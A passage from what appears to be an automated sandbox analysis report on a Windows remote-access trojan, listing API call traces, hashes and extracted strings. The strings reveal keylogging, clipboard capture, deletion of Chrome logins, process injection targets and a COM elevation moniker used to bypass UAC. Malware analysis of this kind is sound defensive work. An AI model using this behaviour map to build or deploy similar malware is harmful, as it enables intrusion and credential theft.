                                                • Opcode Fuzzy Hash: eec28e5122cf95747afd0231d26089d1190572cbd646818cfb2ab67d48c7021b
                                                • Instruction Fuzzy Hash: 65413A319042196ACB14F7A1EC569EE7768EE21318F50017FF801B31E2EF399A458A9E
                                                APIs
                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,?,?,00474358), ref: 0040E233
                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00474358), ref: 0040E25E
                                                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040E27A
                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E2FD
                                                • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E30C
                                                  • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                  • Part of subcall function 004127D5: RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                  • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E371
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Close$CreateHandleProcess32$FileFirstModuleNameNextSnapshotToolhelp32Value
                                                • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$BG
                                                • API String ID: 726551946-3025026198
                                                • Opcode ID: 2298112d5e9beca4c64cadb89c7e546d0899f31810f4b1b50fdabc55d78eae7e
                                                • Instruction ID: ae31f71cb8b9f969ca9e83e5ca698076ed3bac053ed440982de07d1dc4d90588
                                                • Opcode Fuzzy Hash: 2298112d5e9beca4c64cadb89c7e546d0899f31810f4b1b50fdabc55d78eae7e
                                                • Instruction Fuzzy Hash: ED7172311083019BC714FB61D8519EF77A5BF91358F400D3EF986631E2EF38A959CA9A
                                                APIs
                                                • OpenClipboard.USER32 ref: 004159C7
                                                • EmptyClipboard.USER32 ref: 004159D5
                                                • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004159F5
                                                • GlobalLock.KERNEL32(00000000), ref: 004159FE
                                                • GlobalUnlock.KERNEL32(00000000), ref: 00415A34
                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00415A3D
                                                • CloseClipboard.USER32 ref: 00415A5A
                                                • OpenClipboard.USER32 ref: 00415A61
                                                • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                • CloseClipboard.USER32 ref: 00415A89
                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                • String ID:
                                                • API String ID: 3520204547-0
                                                • Opcode ID: 5bf6c0a188ebc9cd77caef7c6d8a55023eea9b799c8747cd0bf31199529283f8
                                                • Instruction ID: b8e523df9fc7c7245f85f50a48877f09888e29e8b5459684195c928b546a98bf
                                                • Opcode Fuzzy Hash: 5bf6c0a188ebc9cd77caef7c6d8a55023eea9b799c8747cd0bf31199529283f8
                                                • Instruction Fuzzy Hash: E02183712043009BC714BBB1EC5AAAE76A9AF80752F00453EFD06961E2EF38C845D66A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: 0$1$2$3$4$5$6$7
                                                • API String ID: 0-3177665633
                                                • Opcode ID: cde1b3d257b3b84ac0aca3a867a652d949c29c2e455d7912b36e5a4a136b74f3
                                                • Instruction ID: 2879f211a781d1662389055333b9a248a4bc7621c6500268a6892da51c348380
                                                • Opcode Fuzzy Hash: cde1b3d257b3b84ac0aca3a867a652d949c29c2e455d7912b36e5a4a136b74f3
                                                • Instruction Fuzzy Hash: CC61A370508301AEDB00EF21D862FEA77E4AF85754F40485EFA91672E1DF789A48C797
                                                APIs
                                                • GetForegroundWindow.USER32 ref: 00409B3F
                                                • GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                • GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                • GetKeyState.USER32(00000010), ref: 00409B5C
                                                • GetKeyboardState.USER32(?), ref: 00409B67
                                                • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409C1C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                • String ID: 8[G
                                                • API String ID: 1888522110-1691237782
                                                • Opcode ID: 0057a6b8e9be89c2a124ace2c7aa15ce6e2280d77a8450e2501583d43799386c
                                                • Instruction ID: f24a8317de74a0bbad47f265c67a45df51816e9018bfad09e00086f3728f1c27
                                                • Opcode Fuzzy Hash: 0057a6b8e9be89c2a124ace2c7aa15ce6e2280d77a8450e2501583d43799386c
                                                • Instruction Fuzzy Hash: EE318172508309AFD700DF90DC85FDBB7ECEB48715F00083ABA45961A1D6B5E948DB96
                                                APIs
                                                • _wcslen.LIBCMT ref: 00406788
                                                • CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Object_wcslen
                                                • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                • API String ID: 240030777-3166923314
                                                • Opcode ID: db32128b02a1ccbc70c4588b7822f6c775a314ba91b6364ff21a4127614396bf
                                                • Instruction ID: dba8c49f7cecafb8ed31af17d29d910bb03d3c12ecd117c8e18c4d6c9c114880
                                                • Opcode Fuzzy Hash: db32128b02a1ccbc70c4588b7822f6c775a314ba91b6364ff21a4127614396bf
                                                • Instruction Fuzzy Hash: 811170B2901118AEDB10FAA5884AA9EB7BCDB48714F55007FE905F3281E7789A148A7D
                                                APIs
                                                • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004748F8), ref: 004198D8
                                                • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00419927
                                                • GetLastError.KERNEL32 ref: 00419935
                                                • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041996D
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                • String ID:
                                                • API String ID: 3587775597-0
                                                • Opcode ID: 46cfc2a1174990e4b59b9ee5729c715e61cf9958b22909a5f2789daa8df81af0
                                                • Instruction ID: 5304d2aa3016a1bb8b693e548c532b43deb082133906afc562c92feca393f19d
                                                • Opcode Fuzzy Hash: 46cfc2a1174990e4b59b9ee5729c715e61cf9958b22909a5f2789daa8df81af0
                                                • Instruction Fuzzy Hash: 37812F711083049BC614FB21DC959AFB7A8BF94718F50493EF582521E2EF78AA05CB9A
                                                APIs
                                                  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F2B
                                                • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 004514C3
                                                • IsValidCodePage.KERNEL32(00000000), ref: 0045151E
                                                • IsValidLocale.KERNEL32(?,00000001), ref: 0045152D
                                                • GetLocaleInfoW.KERNEL32(?,00001001,<D,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00451575
                                                • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 00451594
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                • String ID: <D$<D$<D
                                                • API String ID: 745075371-3495170934
                                                • Opcode ID: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                • Instruction ID: fdda48fcf8ef828b158f806230e01f9d82b9b72a6df542884d0e4dc3e0683d2c
                                                • Opcode Fuzzy Hash: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                • Instruction Fuzzy Hash: 5A51D571900205ABEF10EFA5CC40BBF73B8AF05702F14056BFD11EB262E7789A488769
                                                APIs
                                                • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00409A01
                                                • SetWindowsHookExA.USER32(0000000D,004099D0,00000000), ref: 00409A0F
                                                • GetLastError.KERNEL32 ref: 00409A1B
                                                  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00409A6B
                                                • TranslateMessage.USER32(?), ref: 00409A7A
                                                • DispatchMessageA.USER32(?), ref: 00409A85
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                • String ID: Keylogger initialization failure: error $`#v
                                                • API String ID: 3219506041-3226811161
                                                • Opcode ID: 10065da0f80e2b1588f186909b8751ab17816e81d90ef01b858d99eb9022e310
                                                • Instruction ID: 76b292cdb4e6355f9a4176d1f10d626d2d11be3de55f9aee7ae49bf60faff0c2
                                                • Opcode Fuzzy Hash: 10065da0f80e2b1588f186909b8751ab17816e81d90ef01b858d99eb9022e310
                                                • Instruction Fuzzy Hash: 201194716043015BC710AB7AAC4996B77ECAB94B15B10057FFC45D2291FB34DE01CBAB
                                                APIs
                                                • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B489
                                                • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B4BB
                                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B529
                                                • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B536
                                                  • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B50C
                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B561
                                                • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B568
                                                • GetLastError.KERNEL32(?,?,?,?,?,?,00473EE8,00000000), ref: 0041B570
                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B583
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                • String ID:
                                                • API String ID: 2341273852-0
                                                • Opcode ID: 38605e05b284b3287545d71b9912fe11a1e5e192bb535f2a18b99cb8ec032d5d
                                                • Instruction ID: e81c2b0307560c21eb772b723951cbad4d8c7a866ea933437d0d5d39764c0eb1
                                                • Opcode Fuzzy Hash: 38605e05b284b3287545d71b9912fe11a1e5e192bb535f2a18b99cb8ec032d5d
                                                • Instruction Fuzzy Hash: 0031627184921CAACB20D7B1AC89ADA77BCAF04309F4405EBF505D3181EB799AC5CE69
                                                APIs
                                                • FindFirstFileW.KERNEL32(00000000,?), ref: 00418EBF
                                                • FindNextFileW.KERNEL32(00000000,?,?), ref: 00418F8B
                                                  • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B633
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$Find$CreateFirstNext
                                                • String ID: @CG$XCG$`HG$`HG$>G
                                                • API String ID: 341183262-3780268858
                                                • Opcode ID: c7ab7af1c0f5eed08ada90e0087c4ff74bdb9080a69c09e479a4fb32dedf6aac
                                                • Instruction ID: 861c71bda04042c44626cba1538e35c757a91b728f0af2478fb4c1063bb13cc5
                                                • Opcode Fuzzy Hash: c7ab7af1c0f5eed08ada90e0087c4ff74bdb9080a69c09e479a4fb32dedf6aac
                                                • Instruction Fuzzy Hash: B08141315042405BC314FB62C892EEFB3A5AFD1718F50493FF946671E2EF389A49C69A
                                                APIs
                                                • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 0041301A
                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 00413026
                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004131ED
                                                • GetProcAddress.KERNEL32(00000000), ref: 004131F4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressCloseCreateLibraryLoadProcsend
                                                • String ID: SHDeleteKeyW$Shlwapi.dll
                                                • API String ID: 2127411465-314212984
                                                • Opcode ID: 1163e221b778e35c2499fbcc33069a612b15ae3562f6ed67ec451ccccf7f4a1f
                                                • Instruction ID: cc67afc49b78d61a2372e1362dfc4f5d4a672f2d1b5b468e2109e7b1f18a6fb5
                                                • Opcode Fuzzy Hash: 1163e221b778e35c2499fbcc33069a612b15ae3562f6ed67ec451ccccf7f4a1f
                                                • Instruction Fuzzy Hash: 4FB1B671A043006BC614BA76CC979BE76989F94718F40063FF946B31E2EF7C9A4486DB
                                                APIs
                                                  • Part of subcall function 004124B7: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000), ref: 004124D7
                                                  • Part of subcall function 004124B7: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 004124F5
                                                  • Part of subcall function 004124B7: RegCloseKey.ADVAPI32(00000000), ref: 00412500
                                                • Sleep.KERNEL32(00000BB8), ref: 0040E603
                                                • ExitProcess.KERNEL32 ref: 0040E672
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseExitOpenProcessQuerySleepValue
                                                • String ID: 5.3.0 Pro$override$pth_unenc$BG
                                                • API String ID: 2281282204-3981147832
                                                • Opcode ID: a8e2c88ceb4e55fd25039a1be51ceaadab504b075b3d7079739a6e0ae32f2795
                                                • Instruction ID: 346becae97c590b24629de205d3f766cc2ad037e5fc603921d36f10068cff0f4
                                                • Opcode Fuzzy Hash: a8e2c88ceb4e55fd25039a1be51ceaadab504b075b3d7079739a6e0ae32f2795
                                                • Instruction Fuzzy Hash: 6B21A131B0030027C608767A891BA6F359A9B91719F90443EF805A76D7EE7D8A6083DF
                                                APIs
                                                • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040B257
                                                • GetLastError.KERNEL32 ref: 0040B261
                                                Strings
                                                • [Chrome StoredLogins found, cleared!], xrefs: 0040B287
                                                • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040B222
                                                • UserProfile, xrefs: 0040B227
                                                • [Chrome StoredLogins not found], xrefs: 0040B27B
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: DeleteErrorFileLast
                                                • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                • API String ID: 2018770650-1062637481
                                                • Opcode ID: b5e309dbdaf0aeabe7af2cd1639cb477138ee585283f82b93ad88acdd4edf375
                                                • Instruction ID: 236ee74dc97b4bdf00ef4875347123a6b81b21ae8e03a402b83ae8c28ff1bd46
                                                • Opcode Fuzzy Hash: b5e309dbdaf0aeabe7af2cd1639cb477138ee585283f82b93ad88acdd4edf375
                                                • Instruction Fuzzy Hash: 3001A23168410597CA0477B5ED6F8AE3624E921704F50017FF802731E2FF3A9A0586DE
                                                APIs
                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                • GetLastError.KERNEL32 ref: 00416B02
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                • String ID: SeShutdownPrivilege
                                                • API String ID: 3534403312-3733053543
                                                • Opcode ID: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                • Instruction ID: c28276ca820f5d67da4083ad645d4fedab17ddc29f560671af9b7c8b6b4fa774
                                                • Opcode Fuzzy Hash: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                • Instruction Fuzzy Hash: 25F0D4B5805229BBDB10ABA1EC4DEEF7EBCEF05656F100061B805E2192D6748A44CAB5
                                                APIs
                                                • __EH_prolog.LIBCMT ref: 004089AE
                                                  • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                  • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                                                • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00408A8D
                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00408AE0
                                                • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00408AF7
                                                  • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,00401943,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000), ref: 0040450E
                                                  • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000,?,?,?,?,?,00401943), ref: 0040453C
                                                  • Part of subcall function 004047EB: WaitForSingleObject.KERNEL32(?,000000FF,00475B70,?,?,00000000,00475B70,004017F3), ref: 004047FD
                                                  • Part of subcall function 004047EB: SetEvent.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404808
                                                  • Part of subcall function 004047EB: CloseHandle.KERNELBASE(?,?,?,00000000,00475B70,004017F3), ref: 00404811
                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00408DA1
                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Similarity
                                                • API ID: Find$CloseEventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsendsocket
                                                • String ID:
                                                • API String ID: 4043647387-0
                                                • Opcode ID: 09a69e0303e81d48d1e7444200da9c76687e86ed7c9a89389c8c98f32268c2c3
                                                • Instruction ID: d7705bc86650fd6632c5f082d335fbcd32bd3fe840799e2454ee74f5ab9ae988
                                                • Opcode Fuzzy Hash: 09a69e0303e81d48d1e7444200da9c76687e86ed7c9a89389c8c98f32268c2c3
                                                • Instruction Fuzzy Hash: 11A15C729001089ACB14EBA1DD92AEDB778AF54318F10427FF546B71D2EF385E498B98
                                                APIs
                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,?,?,0041981A,00000000,00000000), ref: 00419BCD
                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,0041981A,00000000,00000000), ref: 00419BE2
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419BEF
                                                • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,0041981A,00000000,00000000), ref: 00419BFA
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0C
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0F
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Similarity
                                                • API ID: Service$CloseHandle$Open$ManagerStart
                                                • String ID:
                                                • API String ID: 276877138-0
                                                • Opcode ID: 413273253f7cbae0f6bd9debfc52a3b8d95171ad4a984208ec06c12d82ce07c5
                                                • Instruction ID: 9ab78235182221d9a13884b701025ebbd4d22640777282bd149d85cf0e5c5631
                                                • Opcode Fuzzy Hash: 413273253f7cbae0f6bd9debfc52a3b8d95171ad4a984208ec06c12d82ce07c5
                                                • Instruction Fuzzy Hash: 46F0E971404314AFD2115B31FC88DBF2AACEF85BA2B00043AF54193191CF68CD4595B9
                                                APIs
                                                  • Part of subcall function 00416AB7: GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                  • Part of subcall function 00416AB7: OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                  • Part of subcall function 00416AB7: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                  • Part of subcall function 00416AB7: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                  • Part of subcall function 00416AB7: GetLastError.KERNEL32 ref: 00416B02
                                                • ExitWindowsEx.USER32(00000000,00000001), ref: 0041595B
                                                • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00415970
                                                • GetProcAddress.KERNEL32(00000000), ref: 00415977
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Similarity
                                                • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                • String ID: PowrProf.dll$SetSuspendState
                                                • API String ID: 1589313981-1420736420
                                                • Opcode ID: 760194600065aa930d76b91875d7e389ee81a04dff370ffb8731a3af4adaf024
                                                • Instruction ID: 94bd0be5b4d635cf3270abd21b93e0cba208aed3fdadf5553bbce7524c8ebf13
                                                • Opcode Fuzzy Hash: 760194600065aa930d76b91875d7e389ee81a04dff370ffb8731a3af4adaf024
                                                • Instruction Fuzzy Hash: 7D2150B0604741E6CA14F7B19856AEF225A9F80748F40883FB402A72D2EF7CDC89865E
                                                APIs
                                                • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,00451502,?,00000000), ref: 0045127C
                                                • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,00451502,?,00000000), ref: 004512A5
                                                • GetACP.KERNEL32(?,?,00451502,?,00000000), ref: 004512BA
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Similarity
                                                • API ID: InfoLocale
                                                • String ID: ACP$OCP
                                                • API String ID: 2299586839-711371036
                                                • Opcode ID: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                • Instruction ID: bcb6c1b5649eca6e102b6d6ca9fa22aa61ab34f591545d84575f60c76f210f03
                                                • Opcode Fuzzy Hash: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                • Instruction Fuzzy Hash: 50212722600100A6D7348F54D900BAB73A6AB40B66F1645E6FD09E7322F736DD49C799
                                                APIs
                                                • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041A650
                                                • LoadResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A664
                                                • LockResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A66B
                                                • SizeofResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A67A
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Similarity
                                                • API ID: Resource$FindLoadLockSizeof
                                                • String ID: SETTINGS
                                                • API String ID: 3473537107-594951305
                                                • Opcode ID: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                • Instruction ID: 83a829ee02157d331b98a48cb758db5ec39b6d120b3a3db205f860a33549a403
                                                • Opcode Fuzzy Hash: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                • Instruction Fuzzy Hash: 3EE01A3A200710ABCB211BA5BC8CD477E39E7867633140036F90582331DA358850CA59
